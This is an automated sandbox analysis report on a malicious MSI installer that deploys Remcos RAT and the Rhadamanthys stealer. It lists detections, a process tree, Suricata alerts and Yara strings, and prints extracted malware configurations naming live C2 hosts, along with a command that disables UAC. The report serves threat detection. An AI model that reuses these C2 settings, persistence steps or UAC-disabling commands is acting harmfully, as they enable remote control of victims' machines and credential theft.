Windows Analysis Report
wE1inOhJA5.msi

Overview

General Information

Sample name: wE1inOhJA5.msi
renamed because original name is a hash value
Original sample name: ff389718792f877fbdabe5cb02a1b3d5de5be988f9b5690250ffdf3409f04000.msi
Analysis ID: 1560070
MD5: 7c26877fcd894cc1355f2a31a551243c
SHA1: 80104216da4cd3449eabf0e0de2bb3a5b2de85ca
SHA256: ff389718792f877fbdabe5cb02a1b3d5de5be988f9b5690250ffdf3409f04000
Tags: EnviaoloLLCmsiuser-JAMESWT_MHT

Detection

Remcos, RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RHADAMANTHYS Stealer
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious MsiExec Embedding Parent
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 7548 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\wE1inOhJA5.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7632 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7708 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • icacls.exe (PID: 7760 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • expand.exe (PID: 7820 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
        • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • task.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
        • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 8076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 5996 cmdline: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 6848 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • task.exe (PID: 6316 cmdline: "task.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
      • task.exe (PID: 716 cmdline: C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
      • task.exe (PID: 7340 cmdline: C:\Users\user\task.exe MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
        • svchost.exe (PID: 2148 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • svchost.exe (PID: 2968 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • chrome.exe (PID: 400 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrFE01.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/6c77fc35" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
              • chrome.exe (PID: 7824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2376,i,16818295695986717264,7118115118329945779,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • msedge.exe (PID: 4212 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6BC.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/32916e99" MD5: 69222B8101B0601CC6663F8381E7E00F)
              • msedge.exe (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • wmplayer.exe (PID: 2240 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
              • dllhost.exe (PID: 1872 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • task.exe (PID: 7396 cmdline: C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
      • task.exe (PID: 7472 cmdline: C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
  • cmd.exe (PID: 1760 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • task.exe (PID: 1272 cmdline: "task.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution:
  • Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna"}
{"Host:Port:Password": ["rm.anonbaba.net:3393:1"], "Assigned name": "zp", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RNN6CM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000001F.00000003.1672134784.0000000003480000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
22.2.task.exe.255066b.2.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
22.2.task.exe.255066b.2.unpack | REMCOS_RAT_variants | unknown | unknown |
              • 0x5f87c:$str_a1: C:\Windows\System32\cmd.exe
              • 0x5f7f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x5f7f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x5fce8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x5f8dc:$str_b2: Executing file:
              • 0x60604:$str_b3: GetDirectListeningPort
              • 0x5f904:$str_b9: Downloaded file:
              • 0x5f8f0:$str_b10: Downloading file:
              • 0x5f994:$str_b12: Failed to upload file:
              • 0x605cc:$str_b13: StartForward
              • 0x605ec:$str_b14: StopForward
              • 0x5f984:$str_b18: Uploaded file:
              • 0x5f944:$str_b19: Unable to delete:
              • 0x5fe21:$str_c0: [Firefox StoredLogins not found]
              • 0x5fd55:$str_c2: [Chrome StoredLogins found, cleared!]
              • 0x5fd31:$str_c3: [Chrome StoredLogins not found]
              • 0x5fe48:$str_c6: \logins.json
              • 0x5fdd1:$str_c7: [Chrome Cookies found, cleared!]
              • 0x5fe89:$str_c8: [Firefox Cookies not found]
              • 0x5fdb5:$str_c9: [Chrome Cookies not found]
              • 0x5feb9:$str_c10: [Firefox cookies found, cleared!]
22.2.task.exe.255066b.2.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
22.2.task.exe.255066b.2.raw.unpack | REMCOS_RAT_variants | unknown | unknown |
                • 0x6107c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x60ff8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x60ff8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x614e8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x610dc:$str_b2: Executing file:
                • 0x61e04:$str_b3: GetDirectListeningPort
                • 0x61104:$str_b9: Downloaded file:
                • 0x610f0:$str_b10: Downloading file:
                • 0x61194:$str_b12: Failed to upload file:
                • 0x61dcc:$str_b13: StartForward
                • 0x61dec:$str_b14: StopForward
                • 0x61184:$str_b18: Uploaded file:
                • 0x61144:$str_b19: Unable to delete:
                • 0x61621:$str_c0: [Firefox StoredLogins not found]
                • 0x61555:$str_c2: [Chrome StoredLogins found, cleared!]
                • 0x61531:$str_c3: [Chrome StoredLogins not found]
                • 0x61648:$str_c6: \logins.json
                • 0x615d1:$str_c7: [Chrome Cookies found, cleared!]
                • 0x61689:$str_c8: [Firefox Cookies not found]
                • 0x615b5:$str_c9: [Chrome Cookies not found]
                • 0x616b9:$str_c10: [Firefox cookies found, cleared!]
30.2.task.exe.6066b.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

                  System Summary

                  Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\apps.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe, ProcessId: 7880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apps
                  Source: Network Connection, Author: bartblaze: Data: DestinationIp: 179.43.171.196, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 1872, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49740
                  Source: Process started, Author: frack113: Data: Command: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files", CommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7708, ParentProcessName: msiexec.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files", ProcessId: 5996, ProcessName: cmd.exe
                  Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\task.exe, ParentImage: C:\Users\user\task.exe, ParentProcessId: 7340, ParentProcessName: task.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2148, ProcessName: svchost.exe
                  Source: Process started, Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\task.exe, ParentImage: C:\Users\user\task.exe, ParentProcessId: 7340, ParentProcessName: task.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2148, ProcessName: svchost.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-21T11:26:52.782197+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49713 | 179.43.171.197 | 3393 | TCP
                  2024-11-21T11:26:55.194507+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49715 | 179.43.171.197 | 3393 | TCP
                  2024-11-21T11:26:55.194578+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49714 | 179.43.171.197 | 3393 | TCP
                  2024-11-21T11:26:55.391739+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49716 | 179.43.171.197 | 3393 | TCP
                  2024-11-21T11:27:25.180334+0100 | 2854824 | 2 | Potentially Bad Traffic | 179.43.171.196 | 5982 | 192.168.2.9 | 49733 | TCP
                  2024-11-21T11:27:37.095856+0100 | 2854824 | 2 | Potentially Bad Traffic | 179.43.171.196 | 5982 | 192.168.2.9 | 49739 | TCP
                  2024-11-21T11:26:56.599190+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.9 | 49717 | 178.237.33.50 | 80 | TCP
                  2024-11-21T11:27:04.162434+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 179.43.171.196 | 5982 | 192.168.2.9 | 49718 | TCP
                  2024-11-21T11:27:25.180334+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 179.43.171.196 | 5982 | 192.168.2.9 | 49733 | TCP
                  2024-11-21T11:27:37.095856+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 179.43.171.196 | 5982 | 192.168.2.9 | 49739 | TCP
                  2024-11-21T11:27:44.401092+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 179.43.171.196 | 443 | 192.168.2.9 | 49740 | TCP

                  AV Detection

                  Source: rm.anonbaba.net, Avira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\bce5c9c7fb0eb5498f5eb0ff4df1bd89.tmp, Avira: detection malicious, Label: BAT/Runner.wekvp
                  Source: C:\Users\user\apps.bat, Avira: detection malicious, Label: BAT/Runner.wekvp
                  Source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": ["rm.anonbaba.net:3393:1"], "Assigned name": "zp", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RNN6CM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: 22.3.task.exe.3b9dcbc.66.raw.unpack, Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna"}
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmp, ReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmp, ReversingLabs: Detection: 66%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\g2m.dll (copy), ReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy), ReversingLabs: Detection: 66%
                  Source: C:\Users\user\g2m.dll, ReversingLabs: Detection: 28%
                  Source: wE1inOhJA5.msi, ReversingLabs: Detection: 44%
                  Source: Yara match, File source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR
                  Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.4% probability
                  Source: C:\Users\user\task.exe, Code function: 22_2_00091181 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,22_2_00091181
                  Source: C:\Users\user\task.exe, Code function: 22_2_00066AFD CryptUnprotectData,LoadLibraryA,GetProcAddress,22_2_00066AFD
                  Source: C:\Users\user\task.exe, Code function: 24_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,24_2_00404423
                  Source: task.exe, Binary or memory string: -----BEGIN PUBLIC KEY-----
                  Source: unknown, HTTPS traffic detected: 179.43.171.196:443 -> 192.168.2.9:49740 version: TLS 1.2
                  Source: Binary string: your_package_name.pdbG source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp, task.exe, 00000008.00000003.1472143930.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp, task.exe, 0000001E.00000002.4491311882.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: wkernel32.pdb source: task.exe, 00000019.00000003.1667788844.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1667935272.0000000002C70000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676696250.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676535563.0000000005430000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000008.00000002.1572618363.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdb source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: your_package_name.pdbI source: expand.exe, 00000006.00000003.1433042313.00000000046D4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: task.exe, 00000019.00000003.1664725236.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1665323555.0000000002D40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675135210.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675381954.0000000005620000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: task.exe, 00000019.00000003.1665989629.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, task.exe, 00000019.00000003.1666587570.0000000002CF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1675802717.0000000005430000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1676138788.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: task.exe, 0000001A.00000002.1666589979.000000000061C000.00000004.00000020.00020000.00000000.sdmp
